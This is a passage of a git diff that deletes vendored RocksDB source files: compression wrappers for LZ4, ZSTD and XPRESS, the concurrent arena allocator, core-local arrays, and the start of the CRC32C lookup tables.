-  LZ4_freeStream(stream);
-#else   // up to r123
-  outlen = LZ4_compress_limitedOutput(input, &(*output)[output_header_len],
-                                      static_cast<int>(length), compress_bound);
-#endif  // LZ4_VERSION_NUMBER >= 10400
-
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(static_cast<size_t>(output_header_len + outlen));
-  return true;
-#endif  // LZ4
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* LZ4_Uncompress(const char* input_data, size_t input_length,
-                            int* decompress_size,
-                            uint32_t compress_format_version,
-                            const Slice& compression_dict = Slice()) {
-#ifdef LZ4
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    if (input_length < 8) {
-      return nullptr;
-    }
-    memcpy(&output_len, input_data, sizeof(output_len));
-    input_length -= 8;
-    input_data += 8;
-  }
-
-  char* output = new char[output_len];
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_streamDecode_t* stream = LZ4_createStreamDecode();
-  if (compression_dict.size()) {
-    LZ4_setStreamDecode(stream, compression_dict.data(),
-                        static_cast<int>(compression_dict.size()));
-  }
-  *decompress_size = LZ4_decompress_safe_continue(
-      stream, input_data, output, static_cast<int>(input_length),
-      static_cast<int>(output_len));
-  LZ4_freeStreamDecode(stream);
-#else   // up to r123
-  *decompress_size =
-      LZ4_decompress_safe(input_data, output, static_cast<int>(input_length),
-                          static_cast<int>(output_len));
-#endif  // LZ4_VERSION_NUMBER >= 10400
-
-  if (*decompress_size < 0) {
-    delete[] output;
-    return nullptr;
-  }
-  assert(*decompress_size == static_cast<int>(output_len));
-  return output;
-#endif  // LZ4
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool LZ4HC_Compress(const CompressionOptions& opts,
-                           uint32_t compress_format_version, const char* input,
-                           size_t length, ::std::string* output,
-                           const Slice& compression_dict = Slice()) {
-#ifdef LZ4
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    output_header_len = 8;
-    output->resize(output_header_len);
-    char* p = const_cast<char*>(output->c_str());
-    memcpy(p, &length, sizeof(length));
-  }
-  int compress_bound = LZ4_compressBound(static_cast<int>(length));
-  output->resize(static_cast<size_t>(output_header_len + compress_bound));
-
-  int outlen;
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_streamHC_t* stream = LZ4_createStreamHC();
-  LZ4_resetStreamHC(stream, opts.level);
-  const char* compression_dict_data =
-      compression_dict.size() > 0 ? compression_dict.data() : nullptr;
-  size_t compression_dict_size = compression_dict.size();
-  LZ4_loadDictHC(stream, compression_dict_data,
-                 static_cast<int>(compression_dict_size));
-
-#if LZ4_VERSION_NUMBER >= 10700  // r129+
-  outlen =
-      LZ4_compress_HC_continue(stream, input, &(*output)[output_header_len],
-                               static_cast<int>(length), compress_bound);
-#else   // r124-r128
-  outlen = LZ4_compressHC_limitedOutput_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound);
-#endif  // LZ4_VERSION_NUMBER >= 10700
-  LZ4_freeStreamHC(stream);
-
-#elif LZ4_VERSION_MAJOR  // r113-r123
-  outlen = LZ4_compressHC2_limitedOutput(input, &(*output)[output_header_len],
-                                         static_cast<int>(length),
-                                         compress_bound, opts.level);
-#else                    // up to r112
-  outlen =
-      LZ4_compressHC_limitedOutput(input, &(*output)[output_header_len],
-                                   static_cast<int>(length), compress_bound);
-#endif                   // LZ4_VERSION_NUMBER >= 10400
-
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(static_cast<size_t>(output_header_len + outlen));
-  return true;
-#endif  // LZ4
-  return false;
-}
-
-inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) {
-#ifdef XPRESS
-  return port::xpress::Compress(input, length, output);
-#endif
-  return false;
-}
-
-inline char* XPRESS_Uncompress(const char* input_data, size_t input_length,
-  int* decompress_size) {
-#ifdef XPRESS
-  return port::xpress::Decompress(input_data, input_length, decompress_size);
-#endif
-  return nullptr;
-}
-
-
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool ZSTD_Compress(const CompressionOptions& opts, const char* input,
-                          size_t length, ::std::string* output,
-                          const Slice& compression_dict = Slice()) {
-#ifdef ZSTD
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = compression::PutDecompressedSizeInfo(
-      output, static_cast<uint32_t>(length));
-
-  size_t compressBound = ZSTD_compressBound(length);
-  output->resize(static_cast<size_t>(output_header_len + compressBound));
-  size_t outlen;
-#if ZSTD_VERSION_NUMBER >= 500  // v0.5.0+
-  ZSTD_CCtx* context = ZSTD_createCCtx();
-  outlen = ZSTD_compress_usingDict(
-      context, &(*output)[output_header_len], compressBound, input, length,
-      compression_dict.data(), compression_dict.size(), opts.level);
-  ZSTD_freeCCtx(context);
-#else  // up to v0.4.x
-  outlen = ZSTD_compress(&(*output)[output_header_len], compressBound, input,
-                         length, opts.level);
-#endif  // ZSTD_VERSION_NUMBER >= 500
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(output_header_len + outlen);
-  return true;
-#endif
-  return false;
-}
-
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* ZSTD_Uncompress(const char* input_data, size_t input_length,
-                             int* decompress_size,
-                             const Slice& compression_dict = Slice()) {
-#ifdef ZSTD
-  uint32_t output_len = 0;
-  if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                            &output_len)) {
-    return nullptr;
-  }
-
-  char* output = new char[output_len];
-  size_t actual_output_length;
-#if ZSTD_VERSION_NUMBER >= 500  // v0.5.0+
-  ZSTD_DCtx* context = ZSTD_createDCtx();
-  actual_output_length = ZSTD_decompress_usingDict(
-      context, output, output_len, input_data, input_length,
-      compression_dict.data(), compression_dict.size());
-  ZSTD_freeDCtx(context);
-#else  // up to v0.4.x
-  actual_output_length =
-      ZSTD_decompress(output, output_len, input_data, input_length);
-#endif  // ZSTD_VERSION_NUMBER >= 500
-  assert(actual_output_length == output_len);
-  *decompress_size = static_cast<int>(actual_output_length);
-  return output;
-#endif
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/concurrent_arena.cc b/thirdparty/rocksdb/util/concurrent_arena.cc
deleted file mode 100644
index 07fa03c..0000000
--- a/thirdparty/rocksdb/util/concurrent_arena.cc
+++ /dev/null
@@ -1,39 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/concurrent_arena.h"
-#include <thread>
-#include "port/port.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread size_t ConcurrentArena::tls_cpuid = 0;
-#endif
-
-ConcurrentArena::ConcurrentArena(size_t block_size, AllocTracker* tracker,
-                                 size_t huge_page_size)
-    : shard_block_size_(block_size / 8),
-      shards_(),
-      arena_(block_size, tracker, huge_page_size) {
-  Fixup();
-}
-
-ConcurrentArena::Shard* ConcurrentArena::Repick() {
-  auto shard_and_index = shards_.AccessElementAndIndex();
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // even if we are cpu 0, use a non-zero tls_cpuid so we can tell we
-  // have repicked
-  tls_cpuid = shard_and_index.second | shards_.Size();
-#endif
-  return shard_and_index.first;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/concurrent_arena.h b/thirdparty/rocksdb/util/concurrent_arena.h
deleted file mode 100644
index 1ab88c7..0000000
--- a/thirdparty/rocksdb/util/concurrent_arena.h
+++ /dev/null
@@ -1,215 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <atomic>
-#include <memory>
-#include <utility>
-#include "port/likely.h"
-#include "util/allocator.h"
-#include "util/arena.h"
-#include "util/core_local.h"
-#include "util/mutexlock.h"
-#include "util/thread_local.h"
-
-// Only generate field unused warning for padding array, or build under
-// GCC 4.8.1 will fail.
-#ifdef __clang__
-#define ROCKSDB_FIELD_UNUSED __attribute__((__unused__))
-#else
-#define ROCKSDB_FIELD_UNUSED
-#endif  // __clang__
-
-namespace rocksdb {
-
-class Logger;
-
-// ConcurrentArena wraps an Arena.  It makes it thread safe using a fast
-// inlined spinlock, and adds small per-core allocation caches to avoid
-// contention for small allocations.  To avoid any memory waste from the
-// per-core shards, they are kept small, they are lazily instantiated
-// only if ConcurrentArena actually notices concurrent use, and they
-// adjust their size so that there is no fragmentation waste when the
-// shard blocks are allocated from the underlying main arena.
-class ConcurrentArena : public Allocator {
- public:
-  // block_size and huge_page_size are the same as for Arena (and are
-  // in fact just passed to the constructor of arena_.  The core-local
-  // shards compute their shard_block_size as a fraction of block_size
-  // that varies according to the hardware concurrency level.
-  explicit ConcurrentArena(size_t block_size = Arena::kMinBlockSize,
-                           AllocTracker* tracker = nullptr,
-                           size_t huge_page_size = 0);
-
-  char* Allocate(size_t bytes) override {
-    return AllocateImpl(bytes, false /*force_arena*/,
-                        [=]() { return arena_.Allocate(bytes); });
-  }
-
-  char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                        Logger* logger = nullptr) override {
-    size_t rounded_up = ((bytes - 1) | (sizeof(void*) - 1)) + 1;
-    assert(rounded_up >= bytes && rounded_up < bytes + sizeof(void*) &&
-           (rounded_up % sizeof(void*)) == 0);
-
-    return AllocateImpl(rounded_up, huge_page_size != 0 /*force_arena*/, [=]() {
-      return arena_.AllocateAligned(rounded_up, huge_page_size, logger);
-    });
-  }
-
-  size_t ApproximateMemoryUsage() const {
-    std::unique_lock<SpinMutex> lock(arena_mutex_, std::defer_lock);
-    lock.lock();
-    return arena_.ApproximateMemoryUsage() - ShardAllocatedAndUnused();
-  }
-
-  size_t MemoryAllocatedBytes() const {
-    return memory_allocated_bytes_.load(std::memory_order_relaxed);
-  }
-
-  size_t AllocatedAndUnused() const {
-    return arena_allocated_and_unused_.load(std::memory_order_relaxed) +
-           ShardAllocatedAndUnused();
-  }
-
-  size_t IrregularBlockNum() const {
-    return irregular_block_num_.load(std::memory_order_relaxed);
-  }
-
-  size_t BlockSize() const override { return arena_.BlockSize(); }
-
- private:
-  struct Shard {
-    char padding[40] ROCKSDB_FIELD_UNUSED;
-    mutable SpinMutex mutex;
-    char* free_begin_;
-    std::atomic<size_t> allocated_and_unused_;
-
-    Shard() : allocated_and_unused_(0) {}
-  };
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  static __thread size_t tls_cpuid;
-#else
-  enum ZeroFirstEnum : size_t { tls_cpuid = 0 };
-#endif
-
-  char padding0[56] ROCKSDB_FIELD_UNUSED;
-
-  size_t shard_block_size_;
-
-  CoreLocalArray<Shard> shards_;
-
-  Arena arena_;
-  mutable SpinMutex arena_mutex_;
-  std::atomic<size_t> arena_allocated_and_unused_;
-  std::atomic<size_t> memory_allocated_bytes_;
-  std::atomic<size_t> irregular_block_num_;
-
-  char padding1[56] ROCKSDB_FIELD_UNUSED;
-
-  Shard* Repick();
-
-  size_t ShardAllocatedAndUnused() const {
-    size_t total = 0;
-    for (size_t i = 0; i < shards_.Size(); ++i) {
-      total += shards_.AccessAtCore(i)->allocated_and_unused_.load(
-          std::memory_order_relaxed);
-    }
-    return total;
-  }
-
-  template <typename Func>
-  char* AllocateImpl(size_t bytes, bool force_arena, const Func& func) {
-    size_t cpu;
-
-    // Go directly to the arena if the allocation is too large, or if
-    // we've never needed to Repick() and the arena mutex is available
-    // with no waiting.  This keeps the fragmentation penalty of
-    // concurrency zero unless it might actually confer an advantage.
-    std::unique_lock<SpinMutex> arena_lock(arena_mutex_, std::defer_lock);
-    if (bytes > shard_block_size_ / 4 || force_arena ||
-        ((cpu = tls_cpuid) == 0 &&
-         !shards_.AccessAtCore(0)->allocated_and_unused_.load(
-             std::memory_order_relaxed) &&
-         arena_lock.try_lock())) {
-      if (!arena_lock.owns_lock()) {
-        arena_lock.lock();
-      }
-      auto rv = func();
-      Fixup();
-      return rv;
-    }
-
-    // pick a shard from which to allocate
-    Shard* s = shards_.AccessAtCore(cpu & (shards_.Size() - 1));
-    if (!s->mutex.try_lock()) {
-      s = Repick();
-      s->mutex.lock();
-    }
-    std::unique_lock<SpinMutex> lock(s->mutex, std::adopt_lock);
-
-    size_t avail = s->allocated_and_unused_.load(std::memory_order_relaxed);
-    if (avail < bytes) {
-      // reload
-      std::lock_guard<SpinMutex> reload_lock(arena_mutex_);
-
-      // If the arena's current block is within a factor of 2 of the right
-      // size, we adjust our request to avoid arena waste.
-      auto exact = arena_allocated_and_unused_.load(std::memory_order_relaxed);
-      assert(exact == arena_.AllocatedAndUnused());
-
-      if (exact >= bytes && arena_.IsInInlineBlock()) {
-        // If we haven't exhausted arena's inline block yet, allocate from arena
-        // directly. This ensures that we'll do the first few small allocations
-        // without allocating any blocks.
-        // In particular this prevents empty memtables from using
-        // disproportionately large amount of memory: a memtable allocates on
-        // the order of 1 KB of memory when created; we wouldn't want to
-        // allocate a full arena block (typically a few megabytes) for that,
-        // especially if there are thousands of empty memtables.
-        auto rv = func();
-        Fixup();
-        return rv;
-      }
-
-      avail = exact >= shard_block_size_ / 2 && exact < shard_block_size_ * 2
-                  ? exact
-                  : shard_block_size_;
-      s->free_begin_ = arena_.AllocateAligned(avail);
-      Fixup();
-    }
-    s->allocated_and_unused_.store(avail - bytes, std::memory_order_relaxed);
-
-    char* rv;
-    if ((bytes % sizeof(void*)) == 0) {
-      // aligned allocation from the beginning
-      rv = s->free_begin_;
-      s->free_begin_ += bytes;
-    } else {
-      // unaligned from the end
-      rv = s->free_begin_ + avail - bytes;
-    }
-    return rv;
-  }
-
-  void Fixup() {
-    arena_allocated_and_unused_.store(arena_.AllocatedAndUnused(),
-                                      std::memory_order_relaxed);
-    memory_allocated_bytes_.store(arena_.MemoryAllocatedBytes(),
-                                  std::memory_order_relaxed);
-    irregular_block_num_.store(arena_.IrregularBlockNum(),
-                               std::memory_order_relaxed);
-  }
-
-  ConcurrentArena(const ConcurrentArena&) = delete;
-  ConcurrentArena& operator=(const ConcurrentArena&) = delete;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/core_local.h b/thirdparty/rocksdb/util/core_local.h
deleted file mode 100644
index 4cc4fd9..0000000
--- a/thirdparty/rocksdb/util/core_local.h
+++ /dev/null
@@ -1,83 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <cstddef>
-#include <thread>
-#include <utility>
-#include <vector>
-
-#include "port/likely.h"
-#include "port/port.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-// An array of core-local values. Ideally the value type, T, is cache aligned to
-// prevent false sharing.
-template <typename T>
-class CoreLocalArray {
- public:
-  CoreLocalArray();
-
-  size_t Size() const;
-  // returns pointer to the element corresponding to the core that the thread
-  // currently runs on.
-  T* Access() const;
-  // same as above, but also returns the core index, which the client can cache
-  // to reduce how often core ID needs to be retrieved. Only do this if some
-  // inaccuracy is tolerable, as the thread may migrate to a different core.
-  std::pair<T*, size_t> AccessElementAndIndex() const;
-  // returns pointer to element for the specified core index. This can be used,
-  // e.g., for aggregation, or if the client caches core index.
-  T* AccessAtCore(size_t core_idx) const;
-
- private:
-  std::unique_ptr<T[]> data_;
-  int size_shift_;
-};
-
-template <typename T>
-CoreLocalArray<T>::CoreLocalArray() {
-  int num_cpus = static_cast<int>(std::thread::hardware_concurrency());
-  // find a power of two >= num_cpus and >= 8
-  size_shift_ = 3;
-  while (1 << size_shift_ < num_cpus) {
-    ++size_shift_;
-  }
-  data_.reset(new T[static_cast<size_t>(1) << size_shift_]);
-}
-
-template <typename T>
-size_t CoreLocalArray<T>::Size() const {
-  return static_cast<size_t>(1) << size_shift_;
-}
-
-template <typename T>
-T* CoreLocalArray<T>::Access() const {
-  return AccessElementAndIndex().first;
-}
-
-template <typename T>
-std::pair<T*, size_t> CoreLocalArray<T>::AccessElementAndIndex() const {
-  int cpuid = port::PhysicalCoreID();
-  size_t core_idx;
-  if (UNLIKELY(cpuid < 0)) {
-    // cpu id unavailable, just pick randomly
-    core_idx = Random::GetTLSInstance()->Uniform(1 << size_shift_);
-  } else {
-    core_idx = static_cast<size_t>(cpuid & ((1 << size_shift_) - 1));
-  }
-  return {AccessAtCore(core_idx), core_idx};
-}
-
-template <typename T>
-T* CoreLocalArray<T>::AccessAtCore(size_t core_idx) const {
-  assert(core_idx < static_cast<size_t>(1) << size_shift_);
-  return &data_[core_idx];
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c.cc b/thirdparty/rocksdb/util/crc32c.cc
deleted file mode 100644
index ae36f82..0000000
--- a/thirdparty/rocksdb/util/crc32c.cc
+++ /dev/null
@@ -1,408 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A portable implementation of crc32c, optimized to handle
-// four bytes at a time.
-
-#include "util/crc32c.h"
-
-#include <stdint.h>
-#ifdef HAVE_SSE42
-#include <nmmintrin.h>
-#endif
-#include "util/coding.h"
-
-namespace rocksdb {
-namespace crc32c {
-
-static const uint32_t table0_[256] = {
-  0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4,
-  0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb,
-  0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b,
-  0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24,
-  0x105ec76f, 0xe235446c, 0xf165b798, 0x030e349b,
-  0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384,
-  0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54,
-  0x5d1d08bf, 0xaf768bbc, 0xbc267848, 0x4e4dfb4b,
-  0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a,
-  0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35,
-  0xaa64d611, 0x580f5512, 0x4b5fa6e6, 0xb93425e5,
-  0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa,
-  0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45,
-  0xf779deae, 0x05125dad, 0x1642ae59, 0xe4292d5a,
-  0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a,
-  0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595,
-  0x417b1dbc, 0xb3109ebf, 0xa0406d4b, 0x522bee48,
-  0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957,
-  0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687,
-  0x0c38d26c, 0xfe53516f, 0xed03a29b, 0x1f682198,
-  0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927,
-  0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38,
-  0xdbfc821c, 0x2997011f, 0x3ac7f2eb, 0xc8ac71e8,
-  0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7,
-  0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096,
-  0xa65c047d, 0x5437877e, 0x4767748a, 0xb50cf789,
-  0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859,
-  0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46,
-  0x7198540d, 0x83f3d70e, 0x90a324fa, 0x62c8a7f9,
-  0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6,
-  0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36,
-  0x3cdb9bdd, 0xceb018de, 0xdde0eb2a, 0x2f8b6829,
-  0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c,
-  0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93,
-  0x082f63b7, 0xfa44e0b4, 0xe9141340, 0x1b7f9043,
-  0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c,
-  0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3,
-  0x55326b08, 0xa759e80b, 0xb4091bff, 0x466298fc,
-  0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c,
-  0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033,
-  0xa24bb5a6, 0x502036a5, 0x4370c551, 0xb11b4652,
-  0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d,
-  0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d,
-  0xef087a76, 0x1d63f975, 0x0e330a81, 0xfc588982,
-  0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d,
-  0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622,
-  0x38cc2a06, 0xcaa7a905, 0xd9f75af1, 0x2b9cd9f2,
-  0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed,
-  0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530,
-  0x0417b1db, 0xf67c32d8, 0xe52cc12c, 0x1747422f,
-  0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff,
-  0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0,
-  0xd3d3e1ab, 0x21b862a8, 0x32e8915c, 0xc083125f,
-  0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540,
-  0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90,
-  0x9e902e7b, 0x6cfbad78, 0x7fab5e8c, 0x8dc0dd8f,
-  0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee,
-  0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1,
-  0x69e9f0d5, 0x9b8273d6, 0x88d28022, 0x7ab90321,
-  0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e,
-  0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81,
-  0x34f4f86a, 0xc69f7b69, 0xd5cf889d, 0x27a40b9e,
-  0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e,
-  0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351
-};
-static const uint32_t table1_[256] = {
-  0x00000000, 0x13a29877, 0x274530ee, 0x34e7a899,
-  0x4e8a61dc, 0x5d28f9ab, 0x69cf5132, 0x7a6dc945,
-  0x9d14c3b8, 0x8eb65bcf, 0xba51f356, 0xa9f36b21,
-  0xd39ea264, 0xc03c3a13, 0xf4db928a, 0xe7790afd,
-  0x3fc5f181, 0x2c6769f6, 0x1880c16f, 0x0b225918,
-  0x714f905d, 0x62ed082a, 0x560aa0b3, 0x45a838c4,
-  0xa2d13239, 0xb173aa4e, 0x859402d7, 0x96369aa0,
-  0xec5b53e5, 0xfff9cb92, 0xcb1e630b, 0xd8bcfb7c,
-  0x7f8be302, 0x6c297b75, 0x58ced3ec, 0x4b6c4b9b,
-  0x310182de, 0x22a31aa9, 0x1644b230, 0x05e62a47,
-  0xe29f20ba, 0xf13db8cd, 0xc5da1054, 0xd6788823,
-  0xac154166, 0xbfb7d911, 0x8b507188, 0x98f2e9ff,
-  0x404e1283, 0x53ec8af4, 0x670b226d, 0x74a9ba1a,
-  0x0ec4735f, 0x1d66eb28, 0x298143b1, 0x3a23dbc6,
-  0xdd5ad13b, 0xcef8494c, 0xfa1fe1d5, 0xe9bd79a2,
-  0x93d0b0e7, 0x80722890, 0xb4958009, 0xa737187e,
-  0xff17c604, 0xecb55e73, 0xd852f6ea, 0xcbf06e9d,
-  0xb19da7d8, 0xa23f3faf, 0x96d89736, 0x857a0f41,
-  0x620305bc, 0x71a19dcb, 0x45463552, 0x56e4ad25,
-  0x2c896460, 0x3f2bfc17, 0x0bcc548e, 0x186eccf9,
-  0xc0d23785, 0xd370aff2, 0xe797076b, 0xf4359f1c,
-  0x8e585659, 0x9dface2e, 0xa91d66b7, 0xbabffec0,
-  0x5dc6f43d, 0x4e646c4a, 0x7a83c4d3, 0x69215ca4,
-  0x134c95e1, 0x00ee0d96, 0x3409a50f, 0x27ab3d78,
-  0x809c2506, 0x933ebd71, 0xa7d915e8, 0xb47b8d9f,
-  0xce1644da, 0xddb4dcad, 0xe9537434, 0xfaf1ec43,
-  0x1d88e6be, 0x0e2a7ec9, 0x3acdd650, 0x296f4e27,
-  0x53028762, 0x40a01f15, 0x7447b78c, 0x67e52ffb,
-  0xbf59d487, 0xacfb4cf0, 0x981ce469, 0x8bbe7c1e,
-  0xf1d3b55b, 0xe2712d2c, 0xd69685b5, 0xc5341dc2,
-  0x224d173f, 0x31ef8f48, 0x050827d1, 0x16aabfa6,
-  0x6cc776e3, 0x7f65ee94, 0x4b82460d, 0x5820de7a,
-  0xfbc3faf9, 0xe861628e, 0xdc86ca17, 0xcf245260,
-  0xb5499b25, 0xa6eb0352, 0x920cabcb, 0x81ae33bc,
-  0x66d73941, 0x7575a136, 0x419209af, 0x523091d8,
-  0x285d589d, 0x3bffc0ea, 0x0f186873, 0x1cbaf004,
-  0xc4060b78, 0xd7a4930f, 0xe3433b96, 0xf0e1a3e1,
-  0x8a8c6aa4, 0x992ef2d3, 0xadc95a4a, 0xbe6bc23d,
-  0x5912c8c0, 0x4ab050b7, 0x7e57f82e, 0x6df56059,
-  0x1798a91c, 0x043a316b, 0x30dd99f2, 0x237f0185,
-  0x844819fb, 0x97ea818c, 0xa30d2915, 0xb0afb162,
-  0xcac27827, 0xd960e050, 0xed8748c9, 0xfe25d0be,
-  0x195cda43, 0x0afe4234, 0x3e19eaad, 0x2dbb72da,
-  0x57d6bb9f, 0x447423e8, 0x70938b71, 0x63311306,
-  0xbb8de87a, 0xa82f700d, 0x9cc8d894, 0x8f6a40e3,
-  0xf50789a6, 0xe6a511d1, 0xd242b948, 0xc1e0213f,
-  0x26992bc2, 0x353bb3b5, 0x01dc1b2c, 0x127e835b,
-  0x68134a1e, 0x7bb1d269, 0x4f567af0, 0x5cf4e287,
-  0x04d43cfd, 0x1776a48a, 0x23910c13, 0x30339464,
-  0x4a5e5d21, 0x59fcc556, 0x6d1b6dcf, 0x7eb9f5b8,
-  0x99c0ff45, 0x8a626732, 0xbe85cfab, 0xad2757dc,
-  0xd74a9e99, 0xc4e806ee, 0xf00fae77, 0xe3ad3600,
-  0x3b11cd7c, 0x28b3550b, 0x1c54fd92, 0x0ff665e5,
-  0x759baca0, 0x663934d7, 0x52de9c4e, 0x417c0439,
-  0xa6050ec4, 0xb5a796b3, 0x81403e2a, 0x92e2a65d,
-  0xe88f6f18, 0xfb2df76f, 0xcfca5ff6, 0xdc68c781,
-  0x7b5fdfff, 0x68fd4788, 0x5c1aef11, 0x4fb87766,
-  0x35d5be23, 0x26772654, 0x12908ecd, 0x013216ba,
-  0xe64b1c47, 0xf5e98430, 0xc10e2ca9, 0xd2acb4de,
-  0xa8c17d9b, 0xbb63e5ec, 0x8f844d75, 0x9c26d502,
-  0x449a2e7e, 0x5738b609, 0x63df1e90, 0x707d86e7,
-  0x0a104fa2, 0x19b2d7d5, 0x2d557f4c, 0x3ef7e73b,
-  0xd98eedc6, 0xca2c75b1, 0xfecbdd28, 0xed69455f,
-  0x97048c1a, 0x84a6146d, 0xb041bcf4, 0xa3e32483
-};
-static const uint32_t table2_[256] = {
-  0x00000000, 0xa541927e, 0x4f6f520d, 0xea2ec073,
-  0x9edea41a, 0x3b9f3664, 0xd1b1f617, 0x74f06469,
-  0x38513ec5, 0x9d10acbb, 0x773e6cc8, 0xd27ffeb6,
-  0xa68f9adf, 0x03ce08a1, 0xe9e0c8d2, 0x4ca15aac,
-  0x70a27d8a, 0xd5e3eff4, 0x3fcd2f87, 0x9a8cbdf9,
